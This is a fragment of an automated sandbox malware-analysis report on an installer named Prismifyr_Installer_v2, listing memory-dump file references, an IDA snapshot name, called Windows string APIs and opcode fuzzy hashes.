                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                          • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                          • Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98